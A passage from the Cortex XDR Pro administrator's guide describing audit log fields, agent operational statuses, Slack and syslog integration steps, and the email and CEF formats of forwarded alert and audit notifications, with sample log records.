• Resolved - Duplicate Incident
• Resolved - False Positive
• Resolved - Auto Resolve - Auto-resolved by Cortex XDR
when all of the alerts contained in an incident have been
excluded.

Total Alerts The total number of alerts in the incident.

Users Users affected by the alerts in the incident. If more than one
user is affected, click on + <n> more to see the list of all users in
the incident.

From the Incidents page, you can right-click an incident to view the incident, and investigate the related
assets, artifacts, and alerts. For more information see Investigate Incidents.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring 423

© 2020 Palo Alto Networks, Inc.
Monitor Administrative Activity
From > Management Auditing, you can track the status of all administrative and investigative
actions. Cortex XDR stores audit logs for 180 days. Use the page filters to narrow the results or Manage
Columns and Rows to add or remove fields as needed.
To ensure you and your colleagues stay informed about administrative activity, you can Configure
Notification Forwarding to forward your Management Audit log to an email distribution list, Syslog server,
or Slack channel.

The following table describes the default and optional additional fields that you can view in alphabetical
order.

Field Description

Email Email address of the administrative user

Description Descriptive summary of the administrative action

Host Name Name of any relevant affected hosts

ID Unique ID for the action

Result Result of the administrative action: Success, Partial, or Fail.

Subtype Sub category of action

Timestamp Time the action took place

Type Type of activity logged, one of the following:

• Agent Configuration
• Agent Installation
• Alert Exclusions
• Alert Notifications
• Alert Rules
• Api Key
• Authentication—User sessions started, along with the user name that
started the session.

424 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring

© 2020 Palo Alto Networks, Inc.
Field Description
• Broker API
• Broker VM
• Dashboards
• Device Control Permanent Exceptions
• Device Control Profile
• Device Control Temporary Exceptions
• Disk Encryption Profile
• Endpoint Administration
• Endpoint Groups
• Extensions Policy
• Extensions Profiles
• Global Exceptions
• Host Firewall Profile
• Incident Management—Actions taken on incidents and on the assets,
alerts, and artifacts in incidents.
• Ingest Data
• Integrations
• Licensing
• Live Terminal—Remote terminal sessions created and actions taken in the
file manager or task manager, a complete history of commands issued,
their success, and the response.
• Managed Threat Hunting
• MSSP
• Policy & Profiles
• Prevention Policy Rules
• Protection Policy
• Protection Profile
• Public API—Authentication activity using an associated Cortex XDR API
key.
• Query Center
• Remediation
• Reporting
• Response—Remedial actions taken, for example to isolate a host and undo
isolate host, or add file hash signature to block list, or undo add hash to
block list
• Rules
• SaaS Collection
• Script Execution
• Starred Incidents
• Vulnerability Assessment

User Name User who performed the action

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring 425

© 2020 Palo Alto Networks, Inc.
Monitor Agent Activity
Viewing agent audit logs requires either a Cortex XDR Prevent or Cortex XDR Pro per
Endpoint license.

The Cortex XDR agent logs entries for events that are monitored by the Cortex XDR agent and reports the
logs back to Cortex XDR hourly. Cortex XDR stores the logs for 180 days. To view the Cortex XDR agent

logs, select > Agent Auditing.

To ensure you and your colleagues stay informed about agent activity, you can Configure Notification
Forwarding to forward your Agent Audit log to an email distribution list, Syslog server, or Slack channel.
You can customize your view of the logs by adding or removing fields to the Agent Audits Table. You
can also filter the page result to narrow down your search. The following table describes the default and
optional fields that you can view in the Cortex XDR Agents Audit Table:

Field Description

Category The Cortex XDR agent logs these endpoint events using one of the following
categories:
• Audit—Successful changes to the agent indicating correct behavior.
• Monitoring—Unsuccessful changes to the agent that may require
administrator intervention.
• Status—Indication of the agent status.

Description Log message that describes the action.

Domain Domain to which the endpoint belongs.

Endpoint ID Unique ID assigned by the Cortex XDR agent.

Endpoint Name Endpoint hostname.

Reason If the action or activity failed, this field indicates the identified cause.

Received Time Date and time when the action was received by the agent and reported back
to Cortex XDR.

Result The result of the action ( Success, Fail, or N/A)

Severity Severity associated with the log:

426 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring

© 2020 Palo Alto Networks, Inc.
Field Description
• High
• Medium
• Low
• Informational

Type and Sub-Type Additional classification of agent log (Type and Sub-Type:
• Installation:
• Install
• Uninstall
• Upgrade
• Policy change:
• Local Configuration Change
• Content Update
• Policy Update
• Process Exception
• Hash Exception
• Agent service:
• Service start (reported only when the agent fails to start and the
RESULT is Fail)
• Service stopped
• Agent modules:
• Module initialization
• Local analysis module
• Local analysis feature extraction
• Agent status:
• Fully protected
• OS incompatible
• Software incompatible
• Kernel driver initialization
• Kernel extension initialization
• Proxy communication
• Quota exceeded
• Minimal content
• Action:
• Scan
• File retrieval
• Terminate process
• Isolate
• Cancel isolation
• Payload execution
• Quarantine
• Restore
• Block IP address
• Unblock IP address

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring 427

© 2020 Palo Alto Networks, Inc.
 Field Description

Timestamp Date and time when the action occurred.

XDR Agent Version Version of the Cortex XDR agent running on the endpoint.

428 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring

© 2020 Palo Alto Networks, Inc.
Monitor Agent Operational Status
From the Cortex XDR management console, you have full visibility into the Cortex XDR agent operational
status on the endpoint, which indicates whether the agent is providing protection according to its
predefined security policies and profiles. By observing the operational status on the endpoint, you can
identify when the agent may suffer from a technical issue or misconfiguration that interferes with the
agent’s protection capabilities or interaction with Cortex XDR and other applications. The Cortex XDR
agent reports the operational status as follows:
• Protected—Indicates that the Cortex XDR agent is running as configured and did not report any
exceptions to Cortex XDR.
• Partially protected—Indicates that the Cortex XDR agent reported one or more exceptions to Cortex
XDR.
• Unprotected—(Linux only) Indicates the Cortex XDR agent is not enforcing protection on the endpoint.
You can monitor the agent Operational Status in Endpoints > Endpoint Management > Endpoint
Administration. If the Operational Status field is missing, add it.
The operational status that the agent reports varies according to the exceptions reported by the Cortex
XDR agent.

Status Description

Protected (Windows, Mac, and Linux) Indicates all protection modules are running as
configured on the endpoint.

Partially protected Windows

• XDR data collection is not running, or not set
• Behavioral threat protection is not running
• Malware protection is not running
• Exploit protection is not running
Mac
• Operating system adaptive mode*
• XDR Data Collection is not running, or not set
• Behavioral threat protection is not running
• Malware protection is not running
• Exploit protection is not running
Linux
• Kernel module not loaded**
• Kernel module compatible but not loaded**
• Kernel version not compatible**
• XDR Data Collection is not running, or not set
• Behavioral threat protection is not running
• Anti-malware flow is asynchronous
• Malware protection is not running
• Exploit protection is not running

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring 429

© 2020 Palo Alto Networks, Inc.
 Status Description

Unprotected Windows, Mac, and Linux:

• Behavioral threat protection and Malware protection are not running
• Exploit protection and malware protection are not running
• The content is unavailable.

Status can have the following implications on the endpoint:

• *(Status)—The exploit protection module is not running.
• **(Status)—
• XDR data collection is not running
• Behavioral threat protection is not running
• Anti-malware flow is asynchronous
• Local privilege escalation protection is asynchronous

430 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring

Log Forwarding
To help you stay informed and updated, you can easily forward Cortex XDR™ alerts and
reports to an external syslog receiver, a Slack channel, or to email accounts.

> Log Forwarding Data Types

> Integrate Slack for Outbound Notifications
> Integrate a Syslog Receiver
> Configure Notification Forwarding
> Cortex XDR Log Notification Formats

431
432 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding
© 2020 Palo Alto Networks, Inc.
Log Forwarding Data Types
To ensure you and your colleagues are informed and updated about events in your Cortex XDR
deployment, you can Configure Notification Forwarding to Email, Slack, or a syslog receiver. The following
table displays the data types supported by each notification receiver.

Data Type Email Slack Syslog Cortex XSOAR

Alerts

Agent Audit Log — —

Cortex XDR Prevent
or Cortex XDR Pro per
Endpoint

Management Audit Log — — —

Reports — —

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 433

© 2020 Palo Alto Networks, Inc.
Integrate Slack for Outbound Notifications
Integrate Cortex XDR app with your Slack workspace to better manage and highlight your Cortex XDR
alerts and reports. By creating a Cortex XDR Slack channel, you ensure that defined Cortex XDR alerts are
exposed on laptop and mobile devices using the Slack interface. Unlike email notifications, Slack channels
are dedicated to spaces that you can use to contact specific members regrading your Cortex XR alerts.
To configure a Slack notification, you must first install and configure the Cortex XDR app on Slack.

STEP 1 |
From Cortex XDR, select > Settings > Integrations > External Applications.

STEP 2 | Select the provided link to install Cortex XDR on your Slack workspace.

You are directed to the Slack browser to install the Cortex XDR app. You can only use
this link to install Cortex XDR on Slack. Attempting to install from Slack marketplace will
redirect you to Cortex XDR documentation.

434 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
STEP 3 | Click Submit.
Upon successful installation, Cortex XDR displays the workspace to which you connected.

STEP 4 | Configure Notification Forwarding.

After you integrate with your Slack workspace, you can configure your forwarding settings.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 435

© 2020 Palo Alto Networks, Inc.
Integrate a Syslog Receiver
To send Cortex XDR notifications to your Syslog server, you need to define the settings for the Syslog
receiver from which you want to send notifications.

STEP 1 | Before you define the Syslog settings, enable access to the following Cortex XDR IP addresses
for your deployment region in your firewall configurations:

Region Log Forwarding IP Addresses

US • 35.232.87.9
• 35.224.66.220

EU • 34.90.202.186
• 34.90.105.250

UK • 34.105.227.105
• 34.105.149.197

SG • 35.240.192.37
• 34.87.125.227

JP • 34.84.88.183
• 35.243.76.189

AU • 35.189.38.167
• 34.87.219.39

STEP 2 |
Navigate to > Settings > Integrations > External Applications.

STEP 3 | In Syslog Servers, add a + New Server.

STEP 4 | Define the Syslog server parameters:

• Name—Unique name for the server profile.
• Destination—IP address or fully qualified domain name (FQDN) of the Syslog server.
• Port—The port number on which to send Syslog messages.
• Facility—Choose one of the Syslog standard values. The value maps to how your Syslog server uses
the facility field to manage messages. For details on the facility field, see RFC 5424.
• Protocol—Select a method of communication with the Syslog server:
• TCP—No validation is made on the connection with the Syslog server. However, if an error
occurred with the domain used to make the connection, the Test connection will fail.
• UDP—Cortex XDR runs a validation to ensure connection was made with the syslog server.

436 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
 • TCP + SSL—Cortex XDR validates the syslog server certificate and uses the certificate signature
and public key to encrypt the data sent over the connection.
• Certificate—The communication between Cortex XDR and the Syslog destination can use TLS. In
this case, upon connection, Cortex XDR validates that the Syslog receiver has a certificate signed by
either a trusted root CA or a self signed certificate.
If your syslog receiver uses a self signed CA, Browse and upload your Self Signed Syslog Receiver CA.

Make sure the self signed CA includes your public key.

If you only use a trusted root CA leave the Certificate field empty.
• Ignore Certificate Error—Cortex XDR does not recommend, but you can choose to select this option
to ignore certificate errors if they occur. This will forward alerts and logs even if the certificate
contains errors.

STEP 5 | Test the parameters to ensure a valid connection and Create when ready.
You can define up to five Syslog servers. Upon success, the table displays the Syslog servers and their
status.

STEP 6 | (Optional) Manage your Syslog server connection.

In the Syslog Servers table
• Locate your Syslog server and right-click to Send text message to test the connection.
Cortex XDR sends a message to the defined Syslog server which you can check to see if the test
message indeed arrived.
• Locate the Status field.
The Status field displays a Valid or Invalid TCP connection. Cortex XDR tests connection with the
Syslog server every 10min. If no connection is found after 1 hour, Cortex XDR send a notice to the
Notification Center.

If you find the Syslog data limited, Cortex XDR recommended to run the Get Alerts API for
complete alert data.

STEP 7 | Configure Notification Forwarding.

After you integrate with your Syslog receiver, you can configure your forwarding settings.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 437

© 2020 Palo Alto Networks, Inc.
Configure Notification Forwarding
With Cortex XDR you can choose to receive notifications to keep up with the alerts and events that matter
to your teams. To forward notifications, you create a forwarding configuration that specifies the log type
you want to forward. You can also add filters to your configuration to send notifications that match specific
criteria.

Cortex XDR applies the filter only to future alerts and events.

Use this workflow to configure notifications for alerts, agent audit logs, and management audit logs. To
receive notifications about reports, see Create a Report from Scratch.

STEP 1 |
Navigate to > Settings > Notifications.

STEP 2 | + Add Forwarding Configuration.

STEP 3 | Define the configuration Name and Description.

STEP 4 | Select the Log Type you want to forward, one of the following:
• Alerts—Send notifications for specific alert types (for example, XDR Agent or BIOC).
• Agent Audit Logs—Send notifications for audit logs reported by your Cortex XDR agents.
• Management Audit Logs—Send notifications for audit logs about events related to your Cortex XDR
management console.

STEP 5 | In the Configuration Scope, Filter the type of information you want included in a notification.
For example, set a filter Severity = Medium, Alert Source = XDR Agent. Cortex XDR sends
the alerts or events matching this filter as a notification.

STEP 6 | Define your Email Configuration.

1. In Email Distribution, add the email addresses to which you want to send email notifications.
2. Define the Email Grouping Time Frame, in minutes, to specify how often Cortex XDR sends
notifications. Every 30 alerts or 30 events aggregated within this time frame are sent together in
one notification, sorted according to the severity. To send a notification when one alert or event is
generated, set the time frame to 0.
3. Choose whether you want Cortex XDR to provide an auto-generated subject.
4. If you previously used the Log Forwarding app and want to continue forwarding logs in the same
format, you can Use Legacy Log Format. See Cortex XDR Log Notification Formats.

STEP 7 | Configure additional forwarding options:

Depending on the notification integrations supported by the Log Type, configure the desired notification
settings.
• Slack notification—Select a Slack channel.

Before you can select a Slack channel, you must Integrate Slack for Outbound
Notifications.
• Syslog receiver—Select a Syslog receiver.

438 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
 Before you can select a Syslog server, you must Integrate a Syslog Receiver in Cortex
XDR app.

STEP 8 | (Optional) To later modify a saved forwarding configuration, right-click the configuration, and
Edit, Disable, or Delete it.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 439

© 2020 Palo Alto Networks, Inc.
Cortex XDR Log Notification Formats
When Cortex XDR alerts and audit logs are forwarded to an external data source, notifications are sent in
the following formats. If you prefer Cortex XDR to forward logs in legacy format, you can choose the legacy
option in your log forwarding configuration.
• Alert Notification Format
• Agent Audit Log Notification Format
• Management Audit Log Notification Format
• Legacy—Cortex XDR Log Format for IOC and BIOC Alerts
• Legacy—Cortex XDR (formerly Traps) Log Formats

Alert Notification Format

Cortex XDR Agent, BIOC, IOC, Analytics and third-party alerts are forwarded to external data resources
according to the following formats.

Email Account
Alert notifications are sent to email accounts according to the settings you configured when you Configure
Notification Forwarding. If only one alert exists in the queue, a single alert email format is sent. If more than
one alert was grouped in the time frame, all the alerts in the queue are forwarded together in a grouped
email format. Emails also include an alert code snippet of the fields of the alerts according to the columns in
the Alert table.
Single Alert Email

Email Subject: Alert: <alert_name>

Email Body:
Alert Name: Suspicious Process Creation
Severity: High
Source: XDR Agent
Category: Malware
Action: Detected
Host: WIN-RN4A1D7IM6L
Username:b_julia
Excluded: No
Starred: Yes
Alert: <link to Cortex XDR app alert view>
Incident: <link to Cortex XDR app incident view>

Grouped Alert Email

Email Subject: Alerts: <first_highest_severity_alert> + x others

Email Body:
Alert Name: Suspicious Process Creation
Severity: High
Source: XDR Agent
Category: MalwareAction: Detected
Host: WIN-RN4A1D7IM6L
Username:b_julia
Excluded:No
Starred: Yes
Alert: <link to Cortex XDR app alert view>Incident: <link to Cortex XDR
app incident view>

440 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
 Alert Name: Behavioral Threat Protection
Alert ID: 2412
Description: A really cool detection
Severity: Medium
Source: XDR Agent
Category: Exploit
Action: Prevented
Host: WIN-RN4A1D7IM6L
Starred: Yes
Alert: <link to Cortex XDR app alert view>
Incident: <link to Cortex XDR app incident view>
Notification Name: “My notification policy 2 ”
Notification Description: “Starred alerts with medium severity”

Body Email

{
"original_alert_json":{
"uuid":"<UUID Value>",
"recordType":"threat",
"customerId":"<Customer ID>",
"severity":4,
"generatedTime":"2020-11-03T07:46:03.166000Z",
"originalAgentTime":"2020-11-03T07:46:01.372974700Z",
"serverTime":"2020-11-03T07:46:03.312633",
"isEndpoint":1,
"agentId":"<agent ID>",
"endPointHeader":{
"osVersion":"<OS version>",
"agentIp":"<Agent IP Address>",
"deviceName":"<Device Name>",
"agentVersion":"<Agent Version>",
"contentVersion":"152-40565",
"policyTag":"<Policy Tag Value>",
"securityStatus":0,
"protectionStatus":0,
"dataCollectionStatus":1,
"isolationStatus":0,
"agentIpList":[
"<IP Address>"
],
"addresses":[
{
"ip":[
"<IP Address>"
],
"mac":"<Mac ID>"
}
],
"liveTerminalEnabled":true,
"scriptExecutionEnabled":true,
"fileRetrievalEnabled":true,
"agentLocation":0,
"fileSearchEnabled":false,
"deviceDomain":"env21.local",
"userName":"Aragorn",
"userDomain":"env21.local",
"userSid":"<User S ID>",
"osType":1,
"is64":1,
"isVdi":0,
"agentId":"<Agent ID>",

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 441

© 2020 Palo Alto Networks, Inc.
 "agentTime":"2020-11-03T07:46:03.166000Z",
"tzOffset":120
},
"messageData":{
"eventCategory":"prevention",
"moduleId":"COMPONENT_WILDFIRE",
"moduleStatusId":"CYSTATUS_MALICIOUS_EXE",
"preventionKey":"<Prevention Key>",
"processes":[
{
"pid":111,
"parentId":<Parent ID>,
"exeFileIdx":0,
"userIdx":0,
"commandLine":"\"C:\\<file path>\\test.exe\" ",
"instanceId":"Instance ID",
"terminated":0
}
],
"files":[
{
"rawFullPath":"C:\\<file path>\\test.exe",
"fileName":"test.exe",
"sha256":"<SHA256 Value>",
"fileSize":"12800",
"innerObjectSha256":"<SHA256 Value>"
}
],
"users":[
{
"userName":"<User Name>",
"userDomain":"<Domain Name>",
"domainUser":"<Domain Name>\\<User Name>"
}
],
"urls":[

],
"postDetected":0,
"sockets":[

],
"containers":[

],
"techniqueId":[

],
"tacticId":[

],
"modules":[

],
"javaStackTrace":[

],
"terminate":0,
"block":0,
"eventParameters":[
"C:\\<file path>\\test.exe",
"B30--A56B9F",

442 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
 "B30--A56B9F",
"1"
],
"sourceProcessIdx":0,
"fileIdx":0,
"verdict":1,
"canUpload":0,
"preventionMode":"reported",
"trapsSeverity":2,
"profile":"Malware",
"description":"WildFire Malware",
"cystatusDescription":"Suspicious executable detected",
"sourceProcess":{
"user":{
"userName":"<User Name>",
"userDomain":"<Domain Name>",
"domainUser":"<Domain Name>"\\"<User Name>"
},
"pid":1111,
"parentId":<Parent ID>,
"exeFileIdx":0,
"userIdx":0,
"commandLine":"\"C:\\<file path>\\test.exe\" ",
"instanceId":"<Instance ID>",
"terminated":0,
"rawFullPath":"C:\\<file path>\\Test.exe",
"fileName":"test.exe",
"sha256":"<SHA256 Value>",
"fileSize":"12800",
"innerObjectSha256":"<SHA256 Value>"
},
"policyId":"<Policy ID>"
}
},
"internal_id":<Internal ID>,
"external_id":"<External ID>",
"severity":"SEV_030_MEDIUM",
"matching_status":"MATCHED",
"end_match_attempt_ts":1604389636437,
"alert_source":"TRAPS",
"local_insert_ts":1604570760,
"source_insert_ts":160470366,
"alert_name":"WildFire Malware",
"alert_category":"Malware",
"alert_description":"Suspicious executable detected",
"bioc_indicator":null,
"matching_service_rule_id":null,
"attempt_counter":1,
"bioc_category_enum_key":null,
"alert_action_status":"REPORTED",
"case_id":111,
"is_whitelisted":false,
"starred":false,
"deduplicate_tokens":null,
"filter_rule_id":null,
"mitre_technique_id_and_name":[
""
],
"mitre_tactic_id_and_name":[
""
],
"agent_id":"80d2e314c92f6",

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 443

© 2020 Palo Alto Networks, Inc.
 "agent_version":"7.2.1.2718",
"agent_ip_addresses":[
"10.208.213.137"
],
"agent_hostname":"<Agent Hostname>",
"agent_device_domain":"<Device Domain>",
"agent_fqdn":"<FQDN Value>",
"agent_os_type":"AGENT_OS_WINDOWS",
"agent_os_sub_type":"<Operating System Sub-Type> ",
"agent_data_collection_status":true,
"mac":"<Mac ID>",
"agent_is_vdi":null,
"agent_install_type":"STANDARD",
"agent_host_boot_time":[
1604446615
],
"event_sub_type":null,
"module_id":[
"WildFire"
],
"association_strength":null,
"dst_association_strength":null,
"story_id":null,
"is_disintegrated":null,
"event_id":null,
"event_type":[
1
],
"event_timestamp":[
1604389563166
],
"actor_effective_username":[
"<Domain Name>\\<User Name>"
],
"actor_process_instance_id":[
"<Actor>\/<Instance ID>"
],
"actor_process_image_path":[
"C:\\<file path>\\test.exe"
],
"actor_process_image_name":[
"test.exe"
],
"actor_process_command_line":[
"\"C:\\<file path>\\test.exe\" "
],
"actor_process_signature_status":[
"SIGNATURE_UNSIGNED"
],
"actor_process_signature_vendor":null,
"actor_process_image_sha256":[
"SHA256 Value>"
],
"actor_process_image_md5":[
"MD5 Value>"
],
"actor_process_causality_id":[
"<Actor>\/<Causality ID>"
],
"actor_causality_id":null,
"actor_process_os_pid":[
1111

444 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
],
"actor_thread_thread_id":[
1222
],
"causality_actor_process_image_name":[
"test1.exe"
],
"causality_actor_process_command_line":[
"C:\\<file path>\\test1.EXE"
],
"causality_actor_process_image_path":[
"C:\\<file path>\\test1.exe"
],
"causality_actor_process_signature_vendor":[
"Microsoft Corporation"
],
"causality_actor_process_signature_status":[
"SIGNATURE_SIGNED"
],
"causality_actor_causality_id":[
"AdaxtV\/iNIMAAAc8AAAAAA=="
],
"causality_actor_process_execution_time":[
1604389557724
],
"causality_actor_process_image_md5":null,
"causality_actor_process_image_sha256":[
"SHA256 value>"
],
"action_file_path":null,
"action_file_name":null,
"action_file_md5":null,
"action_file_sha256":null,
"action_file_macro_sha256":null,
"action_registry_data":null,
"action_registry_key_name":null,
"action_registry_value_name":null,
"action_registry_full_key":null,
"action_local_ip":null,
"action_local_port":null,
"action_remote_ip":null,
"action_remote_port":null,
"action_external_hostname":null,
"action_country":[
"UNKNOWN"
],
"action_process_instance_id":null,
"action_process_causality_id":null,
"action_process_image_name":null,
"action_process_image_sha256":null,
"action_process_image_command_line":null,
"action_process_signature_status":[
"SIGNATURE_UNAVAILABLE"
],
"action_process_signature_vendor":null,
"os_actor_effective_username":null,
"os_actor_process_instance_id":null,
"os_actor_process_image_path":null,
"os_actor_process_image_name":null,
"os_actor_process_command_line":null,
"os_actor_process_signature_status":[
"SIGNATURE_UNAVAILABLE"

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 445

© 2020 Palo Alto Networks, Inc.
 ],
"os_actor_process_signature_vendor":null,
"os_actor_process_image_sha256":null,
"os_actor_process_causality_id":null,
"os_actor_causality_id":null,
"os_actor_process_os_pid":null,
"os_actor_thread_thread_id":[
1396
],
"fw_app_id":null,
"fw_interface_from":null,
"fw_interface_to":null,
"fw_rule":null,
"fw_rule_id":null,
"fw_device_name":null,
"fw_serial_number":null,
"fw_url_domain":null,
"fw_email_subject":null,
"fw_email_sender":null,
"fw_email_recipient":null,
"fw_app_subcategory":null,
"fw_app_category":null,
"fw_app_technology":null,
"fw_vsys":null,
"fw_xff":null,
"fw_misc":null,
"fw_is_phishing":[
"NOT_AVAILABLE"
],
"dst_agent_id":null,
"dst_causality_actor_process_execution_time":null,
"dns_query_name":null,
"dst_action_external_hostname":null,
"dst_action_country":null,
"dst_action_external_port":null,
"is_pcap":null,
"is_excluded":false
}

446 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
Slack Channel
You can send alert notifications to a single Slack contact or a Slack channel. Notifications are similar to the
email format.

Syslog Server
Alert notification forwarded to a Syslog server are sent in a CEF format RF 5425.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 447

© 2020 Palo Alto Networks, Inc.
 Section Description

Syslog Header
<9>: PRI (considered a
prioirty field)1: version
number2020-03-22T07:55:07.964311Z:
timestamp of when alert/log was
sentcortexxdr: host name

CEF Header
HEADER/Vendor="Palo Alto
Networks" (as a constant
string)HEADER/Device Product="Cortex
XDR" (as a constant string)HEADER/
Product Version= Cortex XDR
version (2.0/2.1....)HEADER/
Severity=(integer/0 - Unknown, 6 -
Low, 8 - Medium, 9 - High)HEADER/
Device Event Class ID=alert
sourceHEADER/name =alert name

CEF Body
end=timestamp shost=endpoint_name
deviceFacility=facility
cat=category externalId=external_id
request=request
cs1=initiated_by_process
cs1Label=Initiated by (constant
string) cs2=initiator_commande
cs2Label=Initiator CMD
(constant string) cs3=signature
cs3Label=Signature (constant string)
cs4=cgo_name cs4Label=CGO name
(constant string) cs5=cgo_command
cs5Label=CGO CMD (constant
string) cs6=cgo_signature
cs6Label=CGO Signature (constant
string) dst=destination_ip
dpt=destination_port src=source_ip
spt=source_port fileHash=file_hash
filePath=file_path
targetprocesssignature=target_process_signature
tenantname=tenant_name
tenantCDLid=tenant_id
CSPaccountname=account_name
initiatorSha256=initiator_hash
initiatorPath=initiator_path
osParentName=parent_name
osParentCmd=parent_command
osParentSha256=parent_hash
osParentSignature=parent_signature
osParentSigner=parent_signer
incident=incident_id act=action

Example

448 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
 <177>1 2020-10-04T10:06:55.192016Z cortexxdr - - - - CEF:0|Palo Alto
Networks|Cortex XDR|Cortex XDR 2.4|XDR Analytics|High Connection Rate|
6|end=1601792870694 shost=WGHRAMG deviceFacility=None cat=Discovery
externalId=98106342 request=https:\/\/iga-bh.xdr.eu.paloaltonetworks.com
\/alerts\/98106342 cs1=iexplore.exe cs1Label=Initiated by cs2=
\“C:\\\\Program Files (x86)\\\\Internet Explorer\\\\IEXPLORE.EXE
\” SCODEF:11844 CREDAT:82946 \/prefetch:2 cs2Label=Initiator CMD
cs3=Microsoft CorporationSIGNATURE_SIGNED- cs3Label=Signature
cs4=iexplore.exe cs4Label=CGO name cs5=\“C:\\\\Program Files (x86)\
\\\Internet Explorer\\\\IEXPLORE.EXE\” SCODEF:11844 CREDAT:82946 \/
prefetch:2 cs5Label=CGO CMD cs6=Microsoft CorporationSIGNATURE_SIGNED-
cs6Label=CGO Signature dst=10.12.4.37 dpt=8000 src=10.10.28.140 spt=58003
fileHash=e582676ec900249b408ab4e37976ae8c443635a7da77755daf6f896a172856a3
filePath=C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe
targetprocesssignature=NoneSIGNATURE_UNAVAILABLE- tenantname=iGA
tenantCDLid=1021319191 CSPaccountname=Information & eGovernment Authority
initiatorSha256=e582676ec900249b408ab4e37976ae8c443635a7da77755daf6f896a172856a3
initiatorPath=C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe
cgoSha256=e582676ec900249b408ab4e37976ae8c443635a7da77755daf6f896a172856a3
osParentName=iexplore.exe osParentCmd=\“C:\\\\Program Files (x86)\\\
\Internet Explorer\\\\IEXPLORE.EXE\” SCODEF:11844 CREDAT:82946 \/prefetch:2
osParentSha256=e582676ec900249b408ab4e37976ae8c443635a7da77755daf6f896a172856a3
osParentSignature=SIGNATURE_SIGNED osParentSigner=Microsoft Corporation
incident=118719 act=Detected

Agent Audit Log Notification Format

To forward agent audit logs, you must have either a Cortex XDR Prevent or Cortex XDR Pro
per Endpoint license.

Cortex XDR forwards the agent audit log to external data resources according to the following formats.

Email Account
Cortex XDR can forward agent audit log notifications to email accounts.

Syslog Server
Agent audit logs forwarded to a Syslog server are sent in a CEF format RFC 5425 according to the following
mapping.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 449

© 2020 Palo Alto Networks, Inc.
 Section Description

Syslog Header
<9>: PRI (considered a prioirty field)1: version
number2020-03-22T07:55:07.964311Z: timestamp of when
alert/log was sentcortexxdr: host name

CEF Header
HEADER/Vendor="Palo Alto Networks" (as a constant
string)HEADER/Device Product="Cortex XDR Agent" (as
a constant string)HEADER/Device Version= Cortex XDR
Agent version (7.0/7.1....)HEADER/Severity=(integer/0
- Unknown, 6 - Low, 8 - Medium, 9 - High)HEADER/Device
Event Class ID="Agent Audit Logs" (as a constant
string)HEADER/name = type

CEF Body
dvchost=domain shost=endpoint_name cat=category
end=timestamp rt=received_time cs1Label=agentversion
(constant string) cs1=agent_version cs2Label=subtype
(constant string) cs2=subtype cs3Label=result (constant
string) cs3=result cs4Label=reason (constant string)
cs4=reason msg=event_description tenantname=tenant_name
tenantCDLid=tenant_id CSPaccountname=csp_id

Example:

<182>1 2020-10-04T10:41:14.608731Z cortexxdr - - - - CEF:0|Palo Alto Networks|

Cortex XDR Agent|Cortex XDR Agent 7.2.0.63060|Agent Audit Logs|Agent Service|
9|dvchost=WORKGROUP shost=Test-Agent cat=Monitoring end=1601808073102
rt=1601808074596 cs1Label=agentversion cs1=7.2.0.63060 cs2Label=subtype
cs2=Stop cs3Label=result cs3=N\/A cs4Label=reason cs4=None msg=XDR service
cyserver was stopped on Test-Agent tenantname=Test tenantCDLid=123456
CSPaccountname=1234

Management Audit Log Notification Format

Cortex XDR forwards the management audit log to external data sources according to the following
formats.

Email Account
Management audit log notifications are forward to email accounts.

450 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
Syslog Server
Management Audit logs forwarded to a Syslog server are sent in a CEF format RF 5425 according to the
following mapping:

Section Description

Syslog Header
<9>: PRI (considered a prioirty field)1: version
number2020-03-22T07:55:07.964311Z: timestamp of when
alert/log was sentcortexxdr: host name

CEF Header
HEADER/Vendor="Palo Alto Networks" (as a constant
string)HEADER/Device Product="Cortex XDR" (as a constant
string)HEADER/Device Version= Cortex XDR version
(2.0/2.1....)HEADER/HEADER/Severity=(integer/0 -
Unknown, 6 - Low, 8 - Medium, 9 - High)HEADER/Device
Event Class ID="Management Audit Logs" (as a constant
string)HEADER/name = type

CEF Body
suser=user end=timestamp externalId=external_id
cs1Label=email (constant string) cs1=user_mail
cs2Label=subtype (constant string) cs2=subtype
cs3Label=result (constant string) cs3=result
cs4Label=reason (constant string) cs4=reason
msg=event_description tenantname=tenant_name
tenantCDLid=tenant_id CSPaccountname=csp_id

Example

